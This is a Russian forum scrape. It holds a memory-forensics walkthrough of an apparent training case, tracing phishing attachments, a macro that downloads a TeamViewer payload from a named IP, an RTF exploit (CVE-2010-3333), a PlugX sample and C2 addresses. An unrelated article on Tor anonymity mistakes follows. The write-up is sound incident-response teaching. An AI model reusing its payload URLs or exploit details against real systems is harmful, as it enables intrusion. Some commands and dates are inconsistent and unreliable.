По результатам решения кейса необходимо ответить на ряд вопросов, однако я покажу лишь сам процесс решения. Повторив прохождение, ты сможешь сам дать ответы для закрепления материала.
Загрузим архив с артефактами и приступим к их исследованию.

ИСПОЛЬЗУЕМЫЕ УТИЛИТЫ

Volatility Framework 2.6.1 — инструмент, реализованный на Python 2. Предназначен для извлечения артефактов из образцов энергозависимой памяти.
Bulk extractor — инструмент для извлечения структурированной информации, к примеру адресов электронной почты, URL, доменов.
YARA Editor — программа для тестирования и создания правил YARA.
OST Extractor — инструмент для восстановления OST-контейнеров в EML.
Scdbg — программа для анализа shell-кода.

ИСПОЛЬЗУЕМЫЕ ДЛЯ ИЗВЛЕЧЕНИЯ ДАННЫХ ПЛАГИНЫ VOLATILITY 2

Imageinfo — плагин для определения операционной системы, пакета обновлений и аппаратной архитектуры исследуемого образа.
Pstree — просмотр списка процессов в виде дерева.
Handles — просмотр открытых дескрипторов к файлам, разделам реестра, мьютексам, именованным каналам, событиям в процессах. Также можно отобразить дескрипторы для конкретного процесса, задав фильтр по типу объекта.
Consoles — плагин для поиска команд, которые злоумышленники ввели через cmd.exe. Основное преимущество этого плагина в том, что он не только печатает команды, введенные злоумышленниками, но и собирает весь экранный буфер (ввод и вывод).
Memdump — извлечение всех резидентных страниц памяти в процессе.
Filescan — плагин для поиска объектов FILE_OBJECT в памяти с помощью сканирования тегов пула. Этот плагин найдет все открытые файлы.
Dumpfiles — извлечение кешированных файлов из образа памяти.
Netscan — поиск сетевых артефактов в 32- и 64-разрядных дампах памяти. Этот плагин находит конечные точки TCP и UDP, а также ищет локальные и удаленные IP-адреса.
Printkey — поиск значений в указанном разделе реестра Windows.
Userassist — получение информации из ключа реестра UserAssist.
Mftparser — сканирует записи главной таблицы файлов (MFT) в памяти и выводит информацию о временных метках файлов.
Autoruns — подключаемый плагин для поиска точек сохранения исполняемых файлов в системе. Для подключения плагина нужно добавить его в каталог plugins инструмента Volatility.
Malfind — плагин для поиска скрытого или внедренного в память процессов кода.
Editbox — плагин для извлечения текста из элементов управления Windows Edit.

ИССЛЕДОВАНИЕ ХОСТА ECORPOFFICE

Прежде чем искать вирусную активность, давай получим первичную информацию о системе, имя компьютера, сетевой адрес и версию операционной системы.

Code:Copy to clipboard

python2.7 vol.py -f "ecorpoffice/win7ecorpoffice2010-36b02ed3.vmem" imgeinfo

Версия ОС — Win7SP1x64. Мы будем ее указывать при поиске других артефактов в качестве профиля в Volatility.

Получим имя компьютера, для этого проверим следующий ключ реестра:

Code:Copy to clipboard

SYSTEM\ControlSet001\Control\ComputerName\ComputerName
python2 vol.py -f ecorpoffice/win7ecorpoffice2010-36b02ed3.vmem \
--profile=Win7SP1x64 printkey -K  "ControlSet001\Control\ComputerName\ComputerName"

Имя компьютера исследуемого образа
Выясним сетевой адрес. Для этого проверим ключ, в котором содержатся идентификаторы сетевых адаптеров. Здесь же можно найти и информацию о сети.

Code:Copy to clipboard

python2 vol.py -f  ecorpoffice/win7ecorpoffice2010-36b02ed3.vmem \
--profile=Win7SP1x86_23418 printkey \
-K "ControlSet002\Services\Tcpip\Parameters\Interfaces\{360E0CDC-9C78-4D3B-A0Af-69CC45DE6D70}"

Сетевая информация о хосте
IP-адрес исследуемой машины — 10.1.1.122.

Проанализируем запущенные процессы в системе, их список выгрузим в файл pstree.txt.

Code:Copy to clipboard

python2.7 vol.py -f "ecorpoffice/win7ecorpoffice2010-36b02ed3.vmem" \
--profile=Win7SP1x64 pstree > ecorpoffice/pstree.txt

Список процессов
Мы обнаружили процесс OUTLOOK.EXE, идентификатор процесса — 2692. По сценарию нам известно, что инцидент произошел после того, как пользователь запустил вложение в письме. Восстановим все сообщения пользователя и найдем вредоносное. Для этого ищем в процессе все объекты FILE.

Code:Copy to clipboard

python2.7 vol.py -f "ecorpoffice/win7ecorpoffice2010-36b02ed3.vmem" \
--profile=Win7SP1x64 handles -p 2692 -t FILE > ecorpoffice/FILE_OUTLOOK

В результате анализа объектов FILE обнаружено имя почтового ящика пользователя:

Code:Copy to clipboard

\Device\HarddiskVolume1\Users\phillip.price\AppData\Local\Microsoft\Outlook\phillip.price@e-corp.biz.pst

Попробуем выгрузить этот контейнер из памяти процесса. Найдем физический адрес файла, используя плагин filescan.

Code:Copy to clipboard

python2.7 vol.py -f "ecorpoffice/win7ecorpoffice2010-36b02ed3.vmem" \
--profile=Win7SP1x64 filescan > ecorpoffice/filescan`

Адрес почтового ящика пользователя в системе
Выгружаем найденный файл, даем ему расширение .ost и загружаем в утилиту OST Extractor.

Code:Copy to clipboard

python2.7 vol.py -f "ecorpoffice/win7ecorpoffice2010-36b02ed3.vmem" \
--profile=Win7SP1x64 dumpfiles -Q 0x000000007d4d9450 -u -D ecorpoffice/

Не забываем про аргумент -u, который позволяет выгрузить большее количество данных.

Получаем файл file.None.0xfffffa80042dcf10.dat. Тоже меняем ему разрешение на .ost и загружаем в OST Extractor.

Конвертирование почтового контейнера
После конвертирования OST в указанной папке появится сообщение пользователя в формате EML. Переходим в папку сообщений и смотрим его.

Заголовок письма

Содержимое сообщения
Письмо отправлено с почтового ящика karenmiles@t-online.de. В аттаче — документ bank_statement_088452.doc. IP-адрес почтового сервера — 31.6.35.122. Письмо поступило 4 октября 2016 года в 12:02:04 (UTC).

Чтобы извлечь вложение, можно воспользоваться блокнотом, для этого декодируем аттач из Base64 и сохраняем файл с расширением .doc. Либо можешь открыть EML с помощью почтового клиента (того же Outlook).

Исследовать вредоносные файлы необходимо в изолированной среде. Итак, берем файл bank_statement_088452.doc и начинаем изучать. Его MD5:
c2dbf24a0dc7276a71dd0824647535c9
Проверим наличие макроса в полученном вложении с помощью утилиты olevba.

olevba bank_statement_088452.doc
Результат работы утилиты olevba
Макрос сильно обфусцирован, и по‑быстрому его проанализировать не получится, поэтому откроем документ в Microsoft Word и начнем отлаживать скрипт на Visual Basic.

Содержимое вредоносного документа
Перейдем в «Вид → Макросы» и нажмем кнопку «Отладить». Находим следующий участок кода.

Содержимое макроса
В функции xvkBjM выполняется запуск содержимого в переменной UsoJar. Найдем место в коде, где формируется эта переменная, поставим точку останова и запустим скрипт.

Отладка скрипта
После выполнения этого участка кода в переменной UsoJar появится команда на PowerShell, которая декодирует данные и исполняет их.

Преобразуем данные из Base64 и посмотрим содержимое.

Преобразованные данные
Как видим, скрипт на PowerShell находит и запускает исполняемые файлы вот из этой папки:

Code:Copy to clipboard

C:\Users\<user>\AppData\Local\Temp

Перед тем как запускать вредоносный документ, начнем записывать сетевой трафик, для этого запустим в виртуальной машине Wireshark.

Сетевая активность вредоносного документа
Как видим, до запуска скрипта на PowerShell происходит загрузка полезной нагрузки с IP-адреса 54.174.131.235.

Заголовок сетевого пакета
Вредоносный скрипт на VBA загружает полезную нагрузку со следующего адреса:

Code:Copy to clipboard

http://54.174.131.235/files/tv_x64.exe

Нагрузка будет сохранена в файл

Code:Copy to clipboard

C:\Users\<user>\AppData\Local\Temp\SkypeC2AutoUpdate.exe

Затем этот файл запускается.

Процесс SkypeC2AutoUpdate.exe — это средство удаленного управления TeamViewer.

Найдем системный идентификатор этого процесса в файле pstree. Это 1364.

Идентификатор вредоносного процесса
Теперь изучим сетевую активность процесса. Для этого извлечем из образа все взаимодействия с сетью и сохраним в файлик netscan.txt.

Code:Copy to clipboard

python2.7 vol.py -f "ecorpoffice/win7ecorpoffice2010-36b02ed3.vmem" \
--profile=Win7SP1x64 netscan > ecorpoffice/netscan.txt

Сетевая активность вредоносного процесса
Процесс с идентификатором 1364 взаимодействует с управляющим сервером 54.174.131.235.

Получим дамп адресного пространства процесса.

Code:Copy to clipboard

python2.7 vol.py -f "ecorpoffice/win7ecorpoffice2010-36b02ed3.vmem" \
--profile=Win7SP1x64 memdump -p 1364 -D ecorpoffice/

Выгруженный файл называется 1364.dmp.

Теперь при помощи регулярного выражения найдем все взаимодействия с управляющим сервером 54.174.131.235.

Code:Copy to clipboard

strings 1364.dmp | grep '54.174.131.235'

Взаимодействия с управляющим сервером
Вредоносный файл обращается вот на этот адрес:

Code:Copy to clipboard

http://54.174.131.235/getinfo[.]php

Установив соединение, он отправляет собранную информацию. Версия программного обеспечения TeamViewer (параметр tvrv=) — 0.2.2.2.

Попробуем вытащить данные из полей TeamViewer, нам интересен его пароль и идентификатор. Для этого воспользуемся плагином editbox.

Code:Copy to clipboard

python2.7 vol.py -f "ecorpoffice/win7ecorpoffice2010-36b02ed3.vmem" \
--profile=Win7SP1x64 editbox

Идентификатор хоста
Идентификатор системы — 528 812 561.

Пароль для доступа к удаленному хосту
Пароль для доступа к хосту — P59fS93m.

Попробуем вытащить из процесса интересную информацию, связанную с работой TeamViewer.

Code:Copy to clipboard

strings 1364.dmp | grep 'teamviewer' -B 3 -A 3

Обнаруженный сетевой адрес
В памяти процесса обнаружен сетевой адрес 31.6.13.155, с которого произошел удаленный вход в систему.

Использовав плагин procdump , получим этот процесс, чтобы проверить через VirusTotal.

Code:Copy to clipboard

python2.7 vol.py -f "ecorpoffice/win7ecorpoffice2010-36b02ed3.vmem" \
--profile=Win7SP1x64 procdump -p 1364 -D ecorpoffice/

Получим его хеш и найдем его описание на VirusTotal. MD5-сумма — 6ecd2ed83b0bc2eea7c7a75d06a610b6.

Также проанализируем все письма в папке после работы утилиты ost- extractor.exe.

Письмо с информацией о выкупе
Давай теперь зафиксируем картину произошедшего.

04.10.2016 в 12:02 (UTC) на адрес philip.price@e-corp.biz с адреса armadac0ll3ct1ve@gmail.com поступило письмо, в котором сообщается номер цифрового кошелька, куда необходимо перевести выкуп. Адрес кошелька Bitcoin:

25UMDkGKBe484WSj5Qd8DhK6xkMUzQFydY
04.10.2016 в 12:02:04 (UTC) на адрес philip.price@e-corp.biz от karenmiles@t-online.de пришло фишинговое сообщение, содержащее вредоносный документ bank_statement_088452.doc. Пользователь открыл этот документ, что и привело к компрометации компьютера. С адреса http://54.174.131.235/files/tv_x64.exe на его машину загружается исполняемый файл TeamViewer, содержащий идентификатор и пароль для доступа к скомпрометированному хосту.

В 12:02 04.10.2016 на адрес philip.price@e-corp.biz от armadac0ll3ct1ve@gmail.com пришло сообщение с адресом кошелька Bitcoin. Если компания не переведет на него определенную сумму, злоумышленники начнут атаковать инфраструктуру организации.

ИССЛЕДОВАНИЕ ОБРАЗА ECORPWIN7

Получим первичную информацию о системе.

Code:Copy to clipboard

python2 vol.py -f ecorpwin7/ecorpwin7-e73257c4.vmem --profile=Win7SP1x64 imageinfo

python2 vol.py -f ecorpwin7/ecorpwin7-e73257c4.vmem --profile=Win7SP1x64 printkey \
-K  "ControlSet001\Control\ComputerName\ComputerName"`

python2 vol.py -f ecorpwin7/ecorpwin7-e73257c4.vmem --profile=Win7SP1x64 printkey \
-K  "ControlSet002\Services\Tcpip\Parameters\Interfaces\{3AE5A5FF-4A27-4327-9C26-1493676FB9E5}"

Имя компьютера — WIN-KMUKM7JPN9D, сетевой адрес — 10.1.1.141, профиль операционной системы — Win7SP1x64.

Далее получим список процессов в виде дерева, а также сетевую активность. Результат сохраним в файл.

Code:Copy to clipboard

python2.7 vol.py -f "ecorpwin7/ecorpwin7-e73257c4.vmem" \
--profile=Win7SP1x64 pstree > ecorpwin7/pstree

python2.7 vol.py -f "ecorpwin7/ecorpwin7-e73257c4.vmem" \
--profile=Win7SP1x64 netscan > ecorpwin7/netscan

Находим почтовый процесс OUTLOOK.EXE, идентификатор 2496.

Получим дамп адресного пространства этого процесса.

python2.7 vol.py -f "ecorpwin7/ecorpwin7-e73257c4.vmem" \
--profile=Win7SP1x64 memdump -p 2496 -D ecorpwin7/
Получим список объектов FILE в адресном пространстве процесса.

Code:Copy to clipboard

python2.7 vol.py -f "ecorpwin7/ecorpwin7-e73257c4.vmem" \
--profile=Win7SP1x64 handles -t FILE -p 2496 > ecorpwin7/handles_file_2496

Получаем файл handles_file_2496, а в нем название другого файла:

Code:Copy to clipboard

Outlscott.knowles@e-corp.biz-00000004.pst

Это почтовый контейнер. Найдем его физический адрес и выгрузим его из образа. Для этого получим список файлов:

Code:Copy to clipboard

python2.7 vol.py -f "ecorpwin7/ecorpwin7-e73257c4.vmem" \
--profile=Win7SP1x64 filescan > ecorpwin7/filescan

Физический адрес почтового контейнера
Восстановим почтовый контейнер.

Code:Copy to clipboard

python2.7 vol.py -f "ecorpwin7/ecorpwin7-e73257c4.vmem" \
--profile=Win7SP1x64 dumpfiles -Q 0x000000007de17f20 -u -D ecorpwin7/

Теперь конвертируем файл с помощью OST Extractor и находим сообщение с вложением.

Содержимое вредоносного письма

Заголовок письма
04.10.2016 в 13:35:13 (UTC) от lloydchung@allsafecybersec.com поступило письмо, содержащее вредоносное вложение. IP-адрес почтового сервера отправителя — 31.6.35.122. Выгрузим вложения с помощью Outlook.

Получаем файл RTF:

Code:Copy to clipboard

Important_ECORP_Lawsuit_Washington_Leak.rtf

Но эта версия файла битая. Поэтому попробуем восстановить его не из сообщения, а из памяти. Находим его по названию в выгруженном списке файлов.

Физический адрес вредоносного файла
Восстановим его.

Code:Copy to clipboard

python2.7 vol.py -f "ecorpwin7/ecorpwin7-e73257c4.vmem" \
--profile=Win7SP1x64 dumpfiles -Q 0x000000007d6b3850 -u -D ecorpwin7/

Открываем восстановленный файл в Hex-редакторе и удаляем в конце незначащие нули. MD5-сумма этого файла:

Code:Copy to clipboard

00e4136876bf4c1069ab9c4fe40ed56f

Это реализация эксплоита в документе RTF (CVE-2010-3333). Подробнее о нем можешь прочесть в исследовании Sophos ([PDF](https://www.sophos.com/en- us/medialibrary/pdfs/technical%20papers/sophosrichtextformatmanipulationstpna.pdf)).

Начнем анализ вредоносного документа. Получим список потоков:

Code:Copy to clipboard

py rtfdump.py file.None.0xfffffa80040b3260.dat.rtf

Список потоков документа RTF
Согласно исследованию Sophos, полезная нагрузка находится за фрагментом \sv.

Содержимое документа RTF
Полезная нагрузка начинается после 0xacc8. Выгрузим нагрузку и сохраним в файл shell.

Code:Copy to clipboard

py rtfdump.py  file.None.0xfffffa80040b3260.dat.rtf -s 5 -H -d > shell

Далее с помощью утилиты scdbg найдем точку входа шелл‑кода.

Code:Copy to clipboard

scdbg /f shell /findsc

Поиск точки входа
Полезная нагрузка загружается с ресурса по следующему адресу:

Code:Copy to clipboard

http://files.allsafecybersec.com

Проанализируем процессы.

Процесс svchost.exe с запущенными дочерними процессами rundll32.exe
Мы обнаружили процесс svchost.exe с идентификатором 288, запустивший дочерние процессы rundll32.exe. Получим информацию об их запуске при помощи плагина cmdline.

Code:Copy to clipboard

python2.7 vol.py -f ecorpwin7/ecorpwin7-e73257c4.vmem \
--profile=Win7SP1x64 cmdline >  ecorpwin7/cmdline

Запуск rundll32.exe
Как видим, rundll32.exe запускает динамическую библиотеку C:\ProgramData\test.DLL, функция экспорта GnrkQr.

Выгрузим test.DLL и проверим его на VirusTotal. Для этого найдем физический адрес файла.
Физический адрес файла test.DLL

Code:Copy to clipboard

python2.7 vol.py -f ecorpwin7/ecorpwin7-e73257c4.vmem \
--profile=Win7SP1x64 dumpfiles -Q 0x000000007e8b03c0 -D c74-TeamSpy/ecorpwin7/

Его MD5 — 2769761a23f793d93bbad3ded28e8ebd.

Файлик оказался вредоносным и относится к семейству PlugX.

Найдем управляющий сервер процесса с идентификатором 288.
Адрес управляющего сервера

Вредоносный модуль взаимодействует с управляющим сервером 52.90.110.169.

Далее получим дамп адресного пространства процесса.

Code:Copy to clipboard

python2.7 vol.py -f ecorpwin7/ecorpwin7-e73257c4.vmem \
--profile=Win7SP1x64 memdump -p 288 -D ecorpwin7/

Найдем все URI, через которые шло взаимодействие с files.allsafecybersec.com:

Code:Copy to clipboard

strings  288.dmp | grep files.allsafecybersec.com

Загрузка линукс- пакета

Для бокового перемещения по сети и заражения машин с Linux злоумышленник загрузил модуль linuxav.deb.

Продолжаем анализировать процессы и находим запущенный исполняемый файл conhost.exe, который обрабатывает консольные окна в последних версиях Windows.
Обнаруженный процесс conhost.exe

Получим дамп его адресного пространства.

Code:Copy to clipboard

python2.7 vol.py -f "ecorpwin7/ecorpwin7-e73257c4.vmem" --profile=Win7SP1x64 memdump -p 3056 -D ecorpwin7/

Теперь проанализируем строки в дампе процесса.

Обычно, попав в систему, злоумышленники начинают искать в ней интересные файлы, чтобы их выгрузить. Посмотрим, как злоумышленник выгружал файлы со скомпрометированной системы. Найдем все файлы с расширениями .zip и .rar. При поиске архивов RAR находим файл report.rar.

Code:Copy to clipboard

strings -el 3056.dmp | grep reports.rar  -B 3 -A 3

Результат поиска файла report.rar
Пароль выгружаемых данных — password1234.

Подводим итоги.

04.06.2016 в 13:35:13 (UTC) на почтовый адрес scot.knowles@e-corp.biz от lloydchung@allsafecybersec.com поступило фишинговое сообщение, в которое вложен документ. Этот документ содержит эксплоит CVE-2010-3333, в результате запуска которого произошла компрометация компьютера. Далее на скомпрометированный компьютер установлен вредоносный образец семейства PlugX с управляющим сервером 52.90.110.169. После получения доступа злоумышленники начали выгружать документы в запароленном архиве и для дальнейшего закрепления на серверах организации попытались загрузить модуль linuxav.deb.

ВЫВОДЫ

Итак, мы восстановили действия злоумышленника. Компрометация сети произошла 04.10.2016 в 12:02 (UTC). С почтового сервера 31.6.35.122 на электронные почтовые адреса пользователей philip.price@e-corp.biz и scot.knowles@e-corp.biz поступили вредоносные сообщения. В качестве вложения использовался документ с расширением .doc, содержащий макрос на Visual Basic, и документ RTF с внедренным эксплоитом. Рассылка шла с почтового сервера 31.6.35.122.

Когда пользователь открыл зараженный документ, на скомпрометированный компьютер WIN-191HVE3KTLO загрузилось средство удаленного администрирования TeamViewer, а на хост WIN-KMUKM7JPN9D — вредоносный образец семейства PlugX. После получения контроля над сетью организации злоумышленники потребовали выкуп в размере пяти биткоинов.

Автор @rayhunt454

Анонимность в Tor: что нельзя делать

ID: 676533bbb4103b69df371adc
Thread ID: 70824
Created: 2022-07-29T10:06:31+0000
Last Post: 2022-08-12T08:43:11+0000
Author: peacemaker
Prefix: Статья
Replies: 1 Views: 2K

Посещать собственный сайт в анонимном режиме

«Интересно, как выглядит мой сайт, когда я анонимный?»

Лучше избегать посещения персональных сайтов, к которым прикреплены реальные имена или псевдонимы, особенно если к ним когда-либо подключались не через Tor / с реальным IP-адресом. Вероятно, очень немногие люди посещают ваш личный сайт через Tor. Это значит, что пользователь может быть единственным уникальным клиентом Tor, который сделает это.

Такое поведение ведёт к утечке анонимности, поскольку после посещения веб- сайта вся схема Tor становится «грязной». Если сайт малопопулярен и не получает много трафика, то выходные узлы Tor могут быть почти уверены, что посетитель этого сайта — владелец сайта. С этого момента разумно предположить, что последующие соединения с этого выходного узла Tor тоже идут с компьютера этого пользователя.

Заходить в аккаунты социальных сетей и думать, что вы анонимны

Не заходите в личный аккаунт Facebook или другой социальной сети через Tor. Даже если вместо реального имени используется псевдоним, аккаунт вероятно связан с друзьями, которые знают вас. В результате, социальная сеть может выдвинуть разумное предположение, кем на самом деле является пользователь.

Ни одна система анонимности не идеальна. Софт для онлайновой анонимности может скрывать IP-адреса и местоположение, но Facebook и таким же корпорациям не нужна эта информация. Социальные сети уже знают пользователя, его друзей, содержимое «приватных» сообщений между ними и так далее. Эти данные хранятся как минимум на серверах социальной сети, и никакое программное обеспечение не способно удалить их. Их могут удалить только сами платформы социальных сетей или хакерские группы.

Пользователи, которые заходят в свои аккаунты Facebook и другие аккаунты, получают только защиту местоположения, но не анонимность.

Это не очень хорошо понимают некоторые пользователи социальных сетей:

Майк, буду ли я полностью анонимен, если зайду в свой аккаунт Facebook? Я использую Firefox 3.6 с Tor и NoScript на машине Windows 7. Спасибо.

Click to expand...

Никогда не заходите в аккаунты, которыми вы пользовались без Tor

Всегда предполагайте, что при каждом визите журнал сервера сохраняет следующее:

Клиентские IP-адрес/местоположение.
Дату и время запроса.
Конкретные адреса запрошенных страниц.
Код HTTP.
Количество байт, переданных пользователю.
Агент браузера у пользователя.
Ссылающийся сайт (реферрер).

Также предполагайте, что интернет-провайдер (ISP) запишет как минимум время в онлайне и IP-адрес/местоположение клиента. Провайдер может также записать IP- адреса/местоположение посещённых сайтов, сколько трафика (данных) передано и что конкретно было передано и получено. До тех пор, пока трафик не зашифрован, ISP сможет видеть, какие конкретно действия осуществлялись, полученную и отправленную информацию.

Следующие таблицы дают упрощённое представление, как эти логи могут выглядеть для администраторов.

Таблица : Журнал ISP

Имя| Время| IP/место| Трафик
---|---|---|---
John Doe| 16:00 — 17:00| 1.1.1.1| 500 МБ

Таблица : Расширенный журнал ISP

Имя| Время| IP/место| Трафик| Адрес| Контент
---|---|---|---|---|---
John Doe| 16:00 — 17:00| 1.1.1.1| 1 МБ| google.com| Поисковый запрос 1, запрос 2...
John Doe| 16:00 — 17:00| 1.1.1.1| 490 МБ| youtube.com| Смотрел видео 1, видео 2
John Doe| 16:00 — 17:00| 1.1.1.1| 9 МБ| facebook.com| Зашифрованный трафик

Таблица : Журнал веб-сайта

Имя| Время| IP/место| Трафик| Контент
---|---|---|---|---
—| 16:00 — 16:10| 1.1.1.1| 1 МБ| Поисковый запрос 1, запрос 2...

Понятно, что однотипное журналирование веб-сайтами и интернет-провайдером позволяет легко определить действия пользователя.

Аккаунт компрометируется и привязывается к пользователю даже в случае однократной авторизации через соединение, не защищённое Tor, с реального IP- адреса. Единичные ошибки часто фатальны и ведут к раскрытию многих «анонимных» пользователей.

Не авторизуйтесь в онлайн-банкинге или платёжных системах, если не

осознаёте риски

Не рекомендуется авторизация в онлайн-банке, PayPal, eBay и других важных финансовых аккаунтах, зарегистрированных на имя пользователя. В финансовых системах любое использование Tor угрожает замораживанием аккаунта из-за «подозрительной активности», которая регистрируется системой предотвращения фрода. Причина в том, что хакеры иногда используют Tor для совершения мошеннических действий.

Использование Tor с онлайн-банкингом и финансовыми аккаунтами не является анонимным по причинам, приведённым выше. Это псевдонимность, которая обеспечивает только скрытие IP-адреса, или уловка для доступа к сайту, заблокированному провайдером. Разница между анонимностью и псевдонимностью описана в соответствующей главе.

Если пользователя заблокировали, во многих случаях можно связаться со службой поддержки, чтобы разблокировать аккаунт. Некоторые сервисы даже допускают ослабление правил определения фрода для пользовательских аккаунтов.

Разработчик Whonix Патрик Шлейзер не против использования Tor для обхода блокировки сайта или скрытия IP-адреса. Но пользователь должен понимать, что банковский или другой платёжный аккаунт может быть (временно) заморожен. Кроме того, возможны другие исходы (постоянная блокировка сервиса, удаление аккаунта и т. д.), как сказано в предупреждениях на этой странице и в документации Whonix. Если пользователи осведомлены о рисках и чувствуют уместным использовать Tor в конкретных личных обстоятельствах, конечно же, они могут игнорировать этот совет.

Не чередуйте Tor и Open Wi-Fi

Некоторые пользователи ошибочно думают, что открытый Wi-Fi — более быстрая и безопасная «альтернатива Tor», поскольку IP-адрес нельзя привязать к реальному имени.

Ниже объясним причины, почему лучше использовать открытый Wi-Fi и Tor, но не открытый Wi-Fi или Tor.

Примерное местонахождение любого IP-адреса можно вычислить до города, района или даже улицы. Даже если пользователь далеко от своего дома, открытый Wi-Fi всё равно выдаёт город и примерное местоположение, поскольку большинство людей не путешествуют по континентам.

Личность владельца с открытым Wi-Fi и настройки маршрутизатора — тоже неизвестные переменные. Там может вестись журнал MAC-адресов пользователей с соответствующей активностью этих пользователей в Интернете, которая открыта для владельца маршрутизатора.

Хотя журналирование необязательно нарушает анонимность пользователя, она сужает круг подозреваемых со всего глобального населения Земли или континента, или страны — до конкретного района. Этот эффект сильно ухудшает анонимность. Пользователям следует всегда оставлять у себя максимально возможное количество информации.

Избегайте сценариев «Tor через Tor»

Примечание : это проблема конкретно сервиса Whonix.

Когда используется прозрачный прокси (такой как Whonix), то можно запустить сессии Tor одновременно на стороне клиента и на прозрачном прокси, что создаёт сценарий «Tor через Tor».

Такое происходит при установке Tor внутри Whonix-Workstation или при использовании Tor Browser, который не сконфигурирован для использования SocksPort вместо TransPort. Подробнее об этом написано в статье Tor Browser.

Эти действия рождают неопределённость и потенциально небезопасны. В теории, трафик идёт через шесть узлов луковичной маршрутизации вместо трёх. Но нет гарантии, что три дополнительные узла отличаются от первых трёх; это могут быть те же самые узлы, возможно, в обратном или смешанном порядке. По мнению специалистов Tor Project, это небезопасно:

Мы не поощряем использование более длинных путей, чем стандартные — это увеличивает нагрузку на сеть без (насколько мы можем судить) повышения безопасности. Помните, что самый эффективный способ атаки на Tor — атаковать выходные точки и игнорировать середину пути. Кроме того, использование маршрута длиннее, чем три узла, может вредить анонимности. Во-первых, это упрощает атаки типа «отказ в обслуживании». Во-вторых, подобные действия можно воспринимать как идентификатор пользователя, если только немногие так будут делать («О, смотри, опять тот парень, который изменил длину маршрута»).

Click to expand...

Пользователи могут вручную указывать точку входа или выхода в сети Tor, но с точки зрения безопасности лучше всего оставить выбор маршрута на выбор Tor. Переустановление точки входа или выхода Tor может ухудшить анонимность способами, которые не слишком хорошо понятны. Поэтому конфигурации «Tor через Tor» настоятельно не рекомендуются.

Лицензия главы «Избегайте сценариев „Tor через Tor”»:

Не отправляйте конфиденциальные данные без оконечного шифрования

Как уже объяснялось на странице «Предупреждение», выходные узлы Tor могут прослушивать коммуникации и осуществлять атаки посредника (MiTM), даже при использовании HTTPS. Использование оконечного шифрования — единственный способ отправить конфиденциальные данные получателю, избежав риска перехвата и раскрытия враждебным третьим лицам.

Не раскрывайте в онлайне идентифицирующие данные

Деанонимизация возможна не только с соединениями и IP-адресами, но также социальными способами. Вот некоторые рекомендации защиты от деанонимизации от Anonymous:

Не включайте в ники персональную информацию или личные интересы.
Не обсуждайте персональную информацию, такую как место жительства, возраст, семейный статус и т. д. Со временем глупые беседы вроде обсуждения погоды могут привести к точному вычислению местоположения пользователя.
Не упоминайте пол, татуировки, пирсинг, физические способности или недостатки.
Не упоминайте профессию, хобби или участие в активистских группах.
Не используйте специальные символы на клавиатуре, которые существуют только в вашем языке.
Не публикуйте информацию в обычном Интернете (Clearnet), будучи анонимным.
Не используйте Twitter, Facebook и другие социальные сети. Вас легко будет связать с профилем.
Не публикуйте ссылки на изображения Facebook. В имени файла содержится ваш персональный ID.
Не заходите на один сайт в одно и то же время дня или ночи. Пытайтесь варьировать время сеансов.
Помните, что IRC, другие чаты, форумы, почтовые списки рассылки — это публичные места.
Не обсуждайте ничего личного вообще, даже при защищённом и анонимном подключении к группе незнакомцев. Получатели в группе представляют собой потенциальный риск («известные неизвестные») и их могут заставить работать против пользователя. Нужен всего один информатор, чтобы развалить группу.
Герои существуют только в комиксах — и на них активно охотятся. Есть только молодые или мёртвые герои.

Если необходимо раскрыть какие-то идентификационные данные, то расценивайте их как конфиденциальную информацию, описанную в предыдущем разделе.

Лицензия: Из [документации JonDonym](https://anonymous-proxy- servers.net/en/help/anonymous-irc.html) ([разрешение](https://anonymous-proxy- servers.net/forum/viewtopic.php?p=31220#p31220)).

Используйте мосты, если сеть Tor кажется опасной или подозрительной в

вашем районе

Эта рекомендация идёт с важным предостережением, поскольку мосты не являются идеальным решением:

Мосты — важные инструменты и во многих случаях хорошо работают, но онине являются абсолютной защитой против достижений технического прогресса, которые противник может использовать для идентификации пользователей Tor.

Click to expand...

Не работайте долго под одной и той же цифровой личностью

Чем дольше используется один и тот же псевдоним, тем выше вероятность ошибки, которая выдаст личность пользователя. Как только это произошло, противник может изучить историю и всю активность под этим псевдонимом. Предусмотрительно будет регулярно создавать новые цифровые личности и прекращать использовать старые.

Не используйте несколько цифровых личностей одновременно

Использование псевдонимов в зависимости от контекста со временем становится всё сложнее и чревато ошибками. Различные цифровые личности легко связать, если они используются одновременно, поскольку Tor может повторно использовать цепочки в той же сессии сёрфинга или может произойти потенциальная утечка информации с Whonix-Workstation. Whonix не может магически отделить различные цифровые личности в зависимости от контекста.

Также см. пункт ниже.

Не оставайтесь залогиненным в Twitter, Facebook, Google и др. дольше, чем

необходимо

Сведите время авторизации в Twitter, Facebook, Google и других сервисах с аккаунтами (вроде веб-форумов) до абсолютно необходимого минимума. Немедленно выходите из аккаунта, как только прочитали, опубликовали информацию или выполнили другие необходимые задачи. После выхода из аккаунта безопасным будет закрыть Tor Browser, изменить цепочку Tor с помощью Tor Controller, подождать 10 секунд до смены цепочки — и затем перезапустить Tor Browser. Для лучшей безопасности следуйте рекомендациям по использованию нескольких виртуальных машин и/или нескольких Whonix- Workstation.

Такое поведение необходимо, потому что на многих веб-сайтах размещается одна или больше кнопок интеграции, такие как кнопка Like от Facebook или «Tweet This» от Twitter. В реальности, из 200 000 самых популярных сайтов по рейтингу Alexa социальные виджеты Facebook и Twitter установлены на 47% и 24%, соответственно. Сторонние веб-сервисы Google установлены примерно на 97% сайтов, в основном, это аналитика Google, реклама и сервисы CDN (googleapis.com). Если пользователь сохраняет авторизацию в сервисе, то эти кнопки говорят владельцу сервиса о посещении сайта.

Нельзя недооценивать угрозу приватности от сторонних сервисов:

Каждый раз, когда браузер пользователя обращается к стороннему сервису, то этот сторонний сервер получает возможность доставки следящих скриптов и осуществляет привязку изначального сайта с носителем сторонних куков и отпечатка браузера. Такое отслеживание онлайнового поведения позволяет пополнять профили пользователей, включая конфиденциальную информацию, такую как политические взгляды пользователя и его медицинская история.

Click to expand...

Не смешивайте режимы анонимности

Не смешивайте режимы анонимности! Они излагаются ниже.

Режим 1: анонимный пользователь; любой получатель

Сценарий: Анонимная публикация сообщений на доске объявлений, в списке рассылки, в комментариях, на форуме и т. д.
Сценарий: информаторы, активисты, блоггеры и тому подобные пользователи.
Пользователь анонимен.
Настоящий IP-адрес / местонахождение пользователя скрыты.
Скрытие местонахождения: местонахождение пользователя остаётся секретным.

Режим 2: пользователь знает получателя; оба используют Tor

Сценарий: Отправитель и получатель знают друг друга и оба используют Tor.
Никакая третья сторона не знает о факте коммуникации и не получает её содержания.
Пользователь не анонимен.
Настоящий IP-адрес / местонахождение пользователя скрыты.
